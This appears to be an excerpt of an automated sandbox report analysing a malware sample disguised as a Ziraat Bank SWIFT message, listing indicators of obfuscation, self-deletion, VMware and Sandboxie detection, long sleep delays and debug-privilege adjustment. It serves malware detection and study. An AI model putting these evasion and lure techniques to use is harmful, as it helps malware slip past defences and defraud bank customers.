Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: bqbz.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe

Data Obfuscation

barindex
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05493A68 push eax; retf 2_2_05493A69
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEAFB0 push esp; ret 2_2_05FEAFB1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012CD0D1 push ecx; ret 6_2_012CD0E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0042106C push eax; ret 6_2_004210BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004210C2 push eax; ret 6_2_00421129
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004210B9 push eax; ret 6_2_004210BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00421123 push eax; ret 6_2_00421129
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004059B6 push cs; ret 6_2_004059B7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0040EA2F push eax; retf 6_2_0040EA37
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041ABC4 push ss; iretd 6_2_0041ABC5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041AD59 push esp; iretd 6_2_0041AD5A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004215D0 push esp; iretd 6_2_004215D2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00419D81 push ebx; ret 6_2_00419D82
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00409EC0 push ds; ret 6_2_00409EC8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004226F0 push dword ptr [65B62A56h]; ret 6_2_00422711
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00419F6C push eax; ret 6_2_00419F6D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004227C2 push es; ret 6_2_004227C3
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004057C5 push FFFFFFB8h; ret 6_2_004057D3
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00416FCD push ecx; retf 6_2_00416FD1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: 0xE3C25DA2 [Thu Feb 1 10:59:46 2091 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.8163399193374055
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/YXRV9TApsNT67iKaBw.cs High entropy of concatenated method names: '.ctor', 'uGOSjWMqNH', 'IBUSeSKhj0', 'X0kSZbN7xv', 'nMVSP6QvSa', 'tYCSx7Lt3j', 'nqGSidN1s5', 'AhESKnKTPM', 'XhDS1vn1UD', 'UuUSU6EiRK'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/jHvRSISRVtEBKE5hkd.cs High entropy of concatenated method names: '.ctor', 'rvdHJXTHM', 'rjcSnIgts', 'oyHlvRSIR', 'TtEFBKE5h', 'YdhdWlURT', 'MXxbIEjbu', 'uq6A1227k', 'XSDcWsWCg', 'YyfEteKw6'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/oF02kT8jKxIU4FpGsQ.cs High entropy of concatenated method names: '.ctor', 'j3vlzpxWek', 'gBpFB0lDdx', 'YUeFHVXI8m', 'G1MFSDMhol', 'xLrFlj4f52', 'nsEFFdvqCd', 'D15Fd8nxdi', 'LSTFbPIN6o', 'Fj2FAXAcwt'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/cU5CDJYi4Q3OdAemtw.cs High entropy of concatenated method names: 'svudv70r1h', 'tESdaA9RQk', 'NoEdnQ0rkj', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'wBkaDOpCvpSenq9bIw', 'GLaTO2SeADNRU8BDMm', 'eN9e2th5TMYiSEOxoV', 'EvgPDRlqNgYjkkZXqo'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs High entropy of concatenated method names: '.cctor', 'J8v8c6oAg9DTf', 'h8iFgq2Epl', 'EHlFt9kOdO', 'LDNFRwCmFY', 'fATF592Wvm', 'y9yFTed8Pp', 'g6OFOM2F3k', 'T1xFs7w6U3', 'bKSFIga2hn'

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\systray.exe File deleted: c:\users\user\desktop\ziraat bankasi swift mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 3176, type: MEMORYSTR
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331328236.0000000003337000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe TID: 4620 Thread sleep time: -38122s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01345BA5 rdtsc 6_2_01345BA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe API coverage: 8.1 %
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread delayed: delay time: 38122 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.350388254.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.383069903.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000007.00000000.398658481.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.350827572.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.411917185.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000007.00000000.350388254.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01345BA5 rdtsc 6_2_01345BA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov eax, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov eax, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov eax, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov eax, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 mov ecx, dword ptr fs:[00000030h] 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A513A mov eax, dword ptr fs:[00000030h] 6_2_012A513A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A513A mov eax, dword ptr fs:[00000030h] 6_2_012A513A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279100 mov eax, dword ptr fs:[00000030h] 6_2_01279100
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279100 mov eax, dword ptr fs:[00000030h] 6_2_01279100
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279100 mov eax, dword ptr fs:[00000030h] 6_2_01279100
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127C962 mov eax, dword ptr fs:[00000030h] 6_2_0127C962
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B171 mov eax, dword ptr fs:[00000030h] 6_2_0127B171
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B171 mov eax, dword ptr fs:[00000030h] 6_2_0127B171
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B944 mov eax, dword ptr fs:[00000030h] 6_2_0129B944
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B944 mov eax, dword ptr fs:[00000030h] 6_2_0129B944
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F69A6 mov eax, dword ptr fs:[00000030h] 6_2_012F69A6
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A61A0 mov eax, dword ptr fs:[00000030h] 6_2_012A61A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A61A0 mov eax, dword ptr fs:[00000030h] 6_2_012A61A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F51BE mov eax, dword ptr fs:[00000030h] 6_2_012F51BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov ecx, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF mov eax, dword ptr fs:[00000030h] 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C182 mov eax, dword ptr fs:[00000030h] 6_2_0129C182
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA185 mov eax, dword ptr fs:[00000030h] 6_2_012AA185
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2990 mov eax, dword ptr fs:[00000030h] 6_2_012A2990
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013041E8 mov eax, dword ptr fs:[00000030h] 6_2_013041E8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01344015 mov eax, dword ptr fs:[00000030h] 6_2_01344015
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01344015 mov eax, dword ptr fs:[00000030h] 6_2_01344015
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01332073 mov eax, dword ptr fs:[00000030h] 6_2_01332073
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01341074 mov eax, dword ptr fs:[00000030h] 6_2_01341074
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01290050 mov eax, dword ptr fs:[00000030h] 6_2_01290050
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01290050 mov eax, dword ptr fs:[00000030h] 6_2_01290050
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B90AF mov eax, dword ptr fs:[00000030h] 6_2_012B90AF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
